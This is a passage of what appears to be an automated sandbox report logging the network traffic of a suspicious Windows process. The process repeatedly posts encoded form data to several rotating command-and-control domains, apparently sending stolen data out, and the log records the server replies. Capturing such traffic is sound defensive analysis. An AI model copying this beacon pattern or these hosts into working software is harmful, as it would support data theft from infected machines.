Accept-Language: en-us
Connection: close
Host: www.rokeyfashion.store
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko

Timestamp: Jan 10, 2025 18:55:57.938616037 CET
Bytes transferred: 507
Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Connection: close
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
x-redirect-by: WordPress
location: http://rokeyfashion.store/nfd2/?irCxl6=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZB5AOjp44EvTwqJF0vghgjnDPOb2iH8sdTWQtstyoz2bs+w==&0FJ=D00hHLh
x-litespeed-cache: miss
content-length: 0
date: Fri, 10 Jan 2025 17:55:57 GMT
server: LiteSpeed


Session ID: 21
Source IP: 192.168.2.8
Source Port: 49733
Destination IP: 103.168.172.37
Destination Port: 80
PID: 5180
Process: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe

Timestamp: Jan 10, 2025 18:56:03.175050974 CET
Bytes transferred: 734
Direction: OUT
Data:
POST /up4e/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
Connection: close
Host: www.lucelight.info
Origin: http://www.lucelight.info
Referer: http://www.lucelight.info/up4e/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Data Ascii: irCxl6=YV0Vgh2LitV2oeQbM+QaSCwDEoRYsuyruR1tVlElohdSzdqd7WcCwDIsLfN0A8pbEHXPMd4d1YTPBBsxAF7GoWJeb9Riw9BxKrXvn5QTC+tGAOYM4cJsXfu45yHo7NdMTp2h8IyZJa2UHz5XLpZW5I8EsDYRc2PgtimnzcpZPcrCYvr9p24quuop2TFuiY7qDBldNzg=

Timestamp: Jan 10, 2025 18:56:03.712727070 CET
Bytes transferred: 582
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 10 Jan 2025 17:56:03 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
x-backend: phl-web-01
X-Frontend: phl-frontend-01
X-Trace-Id: ti_f42fbc03a3cc6ced93178f8b8bd54dda
Content-Encoding: br
Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


Session ID: 22
Source IP: 192.168.2.8
Source Port: 49734
Destination IP: 103.168.172.37
Destination Port: 80
PID: 5180
Process: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe

Timestamp: Jan 10, 2025 18:56:05.732431889 CET
Bytes transferred: 754
Direction: OUT
Data:
POST /up4e/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
Connection: close
Host: www.lucelight.info
Origin: http://www.lucelight.info
Referer: http://www.lucelight.info/up4e/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Data Ascii: irCxl6=YV0Vgh2LitV26uAbLfQaXiwALIRY3eynuRJtVkBurXNS2Nad4XcCxDIsD/N1OcpqEHa8Megd1e/PBEoxAyHBpGJcSdRk/dBxKrXvn5spC9dGA+oM+51vLvu5+yHotNdITp2P8JujJZCUH2dXL81X3I8CmjYFVk/solmyxO4+NOj5ZZaXzUwstuAC2QtYnvmCZi1tTk1CIQV3yIlOJDpNK3eSSUnN


Session ID: 23
Source IP: 192.168.2.8
Source Port: 49735
Destination IP: 103.168.172.37
Destination Port: 80
PID: 5180
Process: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe

Timestamp: Jan 10, 2025 18:56:08.277815104 CET
Bytes transferred: 1771
Direction: OUT
Data:
POST /up4e/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Length: 1243
Content-Type: application/x-www-form-urlencoded
Connection: close
Host: www.lucelight.info
Origin: http://www.lucelight.info
Referer: http://www.lucelight.info/up4e/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Data Ascii: irCxl6=[TRUNCATED]

Timestamp: Jan 10, 2025 18:56:08.844739914 CET
Bytes transferred: 582
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 10 Jan 2025 17:56:08 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
x-backend: phl-web-01
X-Frontend: phl-frontend-01
X-Trace-Id: ti_bc98a39741c8df13dc032603cfc1245b
Content-Encoding: br
Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


Session ID: 24
Source IP: 192.168.2.8
Source Port: 49736
Destination IP: 103.168.172.37
Destination Port: 80
PID: 5180
Process: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe

Timestamp: Jan 10, 2025 18:56:10.814485073 CET
Bytes transferred: 470
Direction: OUT
Data:
GET /up4e/?irCxl6=VXc1jWSgqs8x7qdgafwEWVcLTvt60MncsX8sB3hxkBZ1r/WG9R0muDMsDsUoNKEWb3GhLvkp8KOPLwQ4Bi3owHJAbIJD7pBSH8qbt8k3G95dMvpBnol4dqnd3B3JqqcnGw==&0FJ=D00hHLh HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Connection: close
Host: www.lucelight.info
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko

Timestamp: Jan 10, 2025 18:56:11.365905046 CET
Bytes transferred: 808
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 10 Jan 2025 17:56:11 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 544
Connection: close
x-backend: phl-web-01
X-Frontend: phl-frontend-01
X-Trace-Id: ti_7c6a19c71b3e0f3571897df7b2bf37e6
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              25          192.168.2.8  49737        188.114.96.3    80                5180  C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 10, 2025 18:56:16.420114040 CET  746                OUT        POST /kf10/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 207
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.zrichiod-riech.sbs
                                                                              Origin: http://www.zrichiod-riech.sbs
                                                                              Referer: http://www.zrichiod-riech.sbs/kf10/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 4d 4f 44 58 35 34 52 4f 73 38 50 52 4d 75 30 5a 32 6d 54 76 4f 2b 72 56 59 54 65 71 4f 77 78 73 43 75 42 30 38 43 4f 72 44 65 78 71 37 33 67 6e 56 55 78 62 6e 2b 66 53 68 66 68 4e 74 78 57 35 62 49 53 49 4e 78 35 69 63 72 66 5a 50 63 75 5a 65 42 2f 39 6a 43 2b 66 47 68 65 6b 72 7a 70 51 69 54 71 50 6a 31 61 6f 6d 38 55 5a 39 72 4a 53 5a 45 63 54 65 50 4e 44 38 32 79 72 4b 6e 54 47 76 47 73 4b 70 76 76 48 37 63 4b 4c 56 57 6b 50 6e 30 4c 55 70 68 54 69 33 39 50 48 39 72 61 50 6b 4e 6c 68 6d 6e 6e 70 46 4f 68 4a 79 72 64 43 33 6c 75 48 71 57 50 38 61 6e 76 58 55 46 5a 33 61 6c 2f 52 4a 77 34 3d
                                                                              Data Ascii: irCxl6=MODX54ROs8PRMu0Z2mTvO+rVYTeqOwxsCuB08COrDexq73gnVUxbn+fShfhNtxW5bISINx5icrfZPcuZeB/9jC+fGhekrzpQiTqPj1aom8UZ9rJSZEcTePND82yrKnTGvGsKpvvH7cKLVWkPn0LUphTi39PH9raPkNlhmnnpFOhJyrdC3luHqWP8anvXUFZ3al/RJw4=


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              26          192.168.2.8  49738        188.114.96.3    80                5180  C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 10, 2025 18:56:18.977051973 CET  766                OUT        POST /kf10/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 227
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.zrichiod-riech.sbs
                                                                              Origin: http://www.zrichiod-riech.sbs
                                                                              Referer: http://www.zrichiod-riech.sbs/kf10/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 4d 4f 44 58 35 34 52 4f 73 38 50 52 4e 4f 45 5a 77 42 2f 76 4a 65 72 53 47 6a 65 71 45 51 78 6f 43 75 64 30 38 44 62 32 41 6f 4a 71 36 57 51 6e 57 52 64 62 67 2b 66 53 34 76 68 4d 77 42 57 69 62 49 57 71 4e 7a 64 69 63 72 62 5a 50 64 65 5a 65 32 54 38 6a 53 2b 5a 65 52 65 6d 76 7a 70 51 69 54 71 50 6a 31 65 53 6d 39 38 5a 39 62 5a 53 57 46 63 51 58 76 4e 41 30 57 79 72 4f 6e 54 43 76 47 73 6b 70 75 79 73 37 65 43 4c 56 55 4d 50 6e 6c 4c 56 7a 78 54 34 36 64 4f 33 77 6f 6e 6b 67 4e 42 51 6e 31 37 57 47 73 52 6e 33 64 73 6f 74 48 6d 42 70 57 6e 58 61 6b 48 68 52 79 45 66 41 47 76 68 58 6e 76 6c 36 71 67 52 44 41 6f 4f 6d 52 35 35 39 4f 36 56 64 6e 47 59
                                                                              Data Ascii: irCxl6=MODX54ROs8PRNOEZwB/vJerSGjeqEQxoCud08Db2AoJq6WQnWRdbg+fS4vhMwBWibIWqNzdicrbZPdeZe2T8jS+ZeRemvzpQiTqPj1eSm98Z9bZSWFcQXvNA0WyrOnTCvGskpuys7eCLVUMPnlLVzxT46dO3wonkgNBQn17WGsRn3dsotHmBpWnXakHhRyEfAGvhXnvl6qgRDAoOmR559O6VdnGY


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              27          192.168.2.8  49739        188.114.96.3    80                5180  C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 10, 2025 18:56:21.525867939 CET  1783               OUT        POST /kf10/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 1243
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.zrichiod-riech.sbs
                                                                              Origin: http://www.zrichiod-riech.sbs
                                                                              Referer: http://www.zrichiod-riech.sbs/kf10/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 4d 4f 44 58 35 34 52 4f 73 38 50 52 4e 4f 45 5a 77 42 2f 76 4a 65 72 53 47 6a 65 71 45 51 78 6f 43 75 64 30 38 44 62 32 41 72 70 71 36 6b 49 6e 55 32 70 62 68 2b 66 53 77 50 68 52 77 42 58 34 62 4d 79 75 4e 7a 68 59 63 75 48 5a 4a 4c 4b 5a 50 30 72 38 74 53 2b 5a 58 78 65 6a 72 7a 70 46 69 54 36 4c 6a 31 75 53 6d 39 38 5a 39 5a 52 53 66 30 63 51 62 50 4e 44 38 32 79 64 4b 6e 54 71 76 47 30 53 70 75 48 58 37 76 69 4c 56 30 63 50 68 58 54 56 72 68 54 2b 70 74 4f 76 77 6f 72 37 67 4e 4e 55 6e 30 50 38 47 76 42 6e 32 4a 52 31 71 6e 61 66 71 6b 33 61 45 57 54 41 63 79 67 45 46 6c 58 50 61 51 58 61 39 50 77 58 43 6d 6f 4f 6a 53 38 62 6e 71 2f 61 62 54 58 59 71 34 2f 52 65 57 6f 2b 53 6e 52 5a 34 72 58 6a 76 4f 32 66 4e 66 47 42 4b 44 46 45 58 79 71 47 58 4f 61 63 46 35 53 70 4c 73 4e 4b 57 67 71 32 44 6e 4a 74 46 69 32 4e 59 4f 4c 6b 2b 30 56 50 4b 63 64 31 7a 47 6e 6b 50 78 68 36 6b 38 44 33 35 6e 46 49 69 33 6e 61 44 45 2f 50 46 44 37 54 72 5a 65 50 39 57 75 61 72 63 4a 64 48 63 77 [TRUNCATED]
                                                                              Data Ascii: irCxl6=[TRUNCATED]


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              28          192.168.2.8  49740        188.114.96.3    80                5180  C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 10, 2025 18:56:24.064799070 CET  474                OUT        GET /kf10/?irCxl6=BMr36Ol4rNvSddxqg0HaAfLMG0b3PxYJLrZ3pB2pD+hE5HArYgxCudju8uwut0znVv+lDQdvUK2ZT/OSWW6E73ehYzW1pFh3giqPoWaMqdwg87w/En0YZeFR2W2LB0SR+w==&0FJ=D00hHLh HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.zrichiod-riech.sbs
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:57:03.410238981 CET  970                IN         HTTP/1.1 522
                                                                              Date: Fri, 10 Jan 2025 17:57:03 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 15
                                                                              Connection: close
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tJcsGfAh8dQx5%2BKklx4Ff1GPhwxP0%2FNbteS%2BOOBbrS5e0xLN%2BgFGSyDkvLg2kT81Um2dHFuhxKCq1ejxq4%2BqmNfVJ5SqYhAdJaOXy%2FYeOA4JjNWZjrtULk1LRSyH4l%2BoHKNMzA%2F2InGn"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Referrer-Policy: same-origin
                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffe8b251810c346-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1892&min_rtt=1892&rtt_var=946&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                              Data Ascii: error code: 522


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              29          192.168.2.8  49741        84.32.84.32     80                5180  C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 10, 2025 18:57:08.498878002 CET  749                OUT        POST /3io6/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 207
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.absseguridad.online
                                                                              Origin: http://www.absseguridad.online
                                                                              Referer: http://www.absseguridad.online/3io6/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 74 65 2f 57 57 2b 30 52 68 32 66 51 71 52 33 65 76 78 5a 48 4f 34 4b 47 31 34 66 44 4a 77 33 41 68 36 6e 70 36 4c 56 66 66 42 46 4e 50 33 58 38 43 5a 6b 71 4a 78 74 37 65 6a 71 61 65 52 4c 74 67 53 39 65 4e 43 38 35 73 6b 6e 45 54 4b 6d 33 4a 48 73 4e 39 69 73 57 41 6c 49 53 76 65 2f 38 50 5a 47 6a 74 47 45 79 49 62 34 4f 47 46 4c 51 54 65 59 6a 37 61 33 48 67 6e 32 45 64 4e 70 6a 52 31 63 67 76 4a 37 46 73 48 2f 38 66 57 64 39 51 74 51 51 6f 72 36 68 57 31 55 54 2f 37 5a 53 63 66 56 33 42 77 4a 4d 4b 58 6c 64 30 54 72 33 7a 45 34 56 6a 66 48 6f 51 44 47 33 39 44 59 33 58 6e 4c 4a 6d 69 6b 3d
                                                                              Data Ascii: irCxl6=te/WW+0Rh2fQqR3evxZHO4KG14fDJw3Ah6np6LVffBFNP3X8CZkqJxt7ejqaeRLtgS9eNC85sknETKm3JHsN9isWAlISve/8PZGjtGEyIb4OGFLQTeYj7a3Hgn2EdNpjR1cgvJ7FsH/8fWd9QtQQor6hW1UT/7ZScfV3BwJMKXld0Tr3zE4VjfHoQDG39DY3XnLJmik=


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              30          192.168.2.8  49742        84.32.84.32     80                5180  C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 10, 2025 18:57:11.056468010 CET  769                OUT        POST /3io6/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 227
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.absseguridad.online
                                                                              Origin: http://www.absseguridad.online
                                                                              Referer: http://www.absseguridad.online/3io6/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 74 65 2f 57 57 2b 30 52 68 32 66 51 72 78 6e 65 74 53 42 48 5a 6f 4b 46 72 6f 66 44 43 51 33 45 68 36 6a 70 36 50 6c 78 44 6e 74 4e 50 58 6e 38 44 64 77 71 45 52 74 37 57 44 71 66 52 78 4b 68 67 53 42 73 4e 41 6f 35 73 6c 44 45 54 49 75 33 4f 30 30 4b 38 79 73 51 56 56 49 51 78 75 2f 38 50 5a 47 6a 74 47 41 63 49 61 51 4f 47 51 62 51 52 2f 59 73 34 61 33 41 6e 6e 32 45 5a 4e 70 76 52 31 64 46 76 49 58 6a 73 46 58 38 66 55 46 39 51 2f 30 54 69 72 37 71 59 56 56 76 35 65 78 63 53 74 46 71 45 47 4a 4a 56 48 56 62 31 6c 61 64 70 6d 77 54 67 66 76 44 51 41 75 42 34 30 46 66 4e 45 62 35 34 31 79 4a 6d 41 4c 33 5a 50 71 61 72 6a 78 58 6f 56 77 5a 47 59 65 56
                                                                              Data Ascii: irCxl6=te/WW+0Rh2fQrxnetSBHZoKFrofDCQ3Eh6jp6PlxDntNPXn8DdwqERt7WDqfRxKhgSBsNAo5slDETIu3O00K8ysQVVIQxu/8PZGjtGAcIaQOGQbQR/Ys4a3Ann2EZNpvR1dFvIXjsFX8fUF9Q/0Tir7qYVVv5excStFqEGJJVHVb1ladpmwTgfvDQAuB40FfNEb541yJmAL3ZPqarjxXoVwZGYeV


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              31          192.168.2.8  49743        84.32.84.32     80                5180  C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 10, 2025 18:57:13.601264000 CET  1786               OUT        POST /3io6/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 1243
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.absseguridad.online
                                                                              Origin: http://www.absseguridad.online
                                                                              Referer: http://www.absseguridad.online/3io6/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 74 65 2f 57 57 2b 30 52 68 32 66 51 72 78 6e 65 74 53 42 48 5a 6f 4b 46 72 6f 66 44 43 51 33 45 68 36 6a 70 36 50 6c 78 44 6e 6c 4e 4d 6d 48 38 43 36 4d 71 46 52 74 37 59 6a 71 65 52 78 4c 37 67 53 59 6e 4e 41 31 62 73 6e 4c 45 53 71 57 33 50 46 30 4b 32 79 73 51 58 56 49 52 76 65 2f 6c 50 5a 32 6e 74 47 51 63 49 61 51 4f 47 52 72 51 56 75 59 73 30 36 33 48 67 6e 32 49 64 4e 70 44 52 30 30 34 76 49 6a 73 73 30 33 38 65 33 39 39 54 4e 73 54 75 72 37 6f 66 56 56 33 35 65 30 65 53 74 59 54 45 47 56 6a 56 45 46 62 35 52 2f 42 78 31 6f 33 2b 35 2b 6f 52 54 4c 6d 38 54 31 6b 50 56 4b 4c 6c 31 32 48 68 45 75 61 4d 65 4f 77 68 44 77 64 33 78 4d 4f 41 38 7a 6e 70 6d 7a 58 30 48 4e 44 55 50 52 64 37 4b 72 34 4b 6d 36 43 4f 77 5a 4e 33 6e 50 48 51 57 36 50 4c 4c 37 39 66 49 73 34 4d 58 6e 33 64 7a 47 46 32 47 68 38 4c 58 7a 65 2f 38 62 47 4a 6f 46 36 47 4a 62 6f 49 4d 55 52 67 45 4f 56 6f 66 2b 71 72 36 67 2b 71 55 69 4f 37 4e 5a 38 35 38 4a 63 59 42 58 4b 53 74 6a 6c 77 2f 59 64 33 2f 65 [TRUNCATED]
                                                                              Data Ascii: irCxl6=[TRUNCATED]


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              32          192.168.2.8  49744        84.32.84.32     80                5180  C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 10, 2025 18:57:16.146020889 CET  475                OUT        GET /3io6/?irCxl6=gcX2VOQ36WC77lysui5XZ/m5rPyYNRmqhqSEheNQdnlbGlnbCsY2Ojxac1DjYk++nD1McxY4sUfZTb3NP1oMnhI4fmsR5776EaSkwHcYG6c3TDmsIPc66LvHumOhTsoWEA==&0FJ=D00hHLh HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.absseguridad.online
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:57:16.592042923 CET  1236               IN         HTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 17:57:16 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 9973
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Server: hcdn
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              x-hcdn-request-id: 2161d9ce38a8a5aedc7e8923ef6181b5-bos-edge3
                                                                              Expires: Fri, 10 Jan 2025 17:57:15 GMT
                                                                              Cache-Control: no-cache
                                                                              Accept-Ranges: bytes
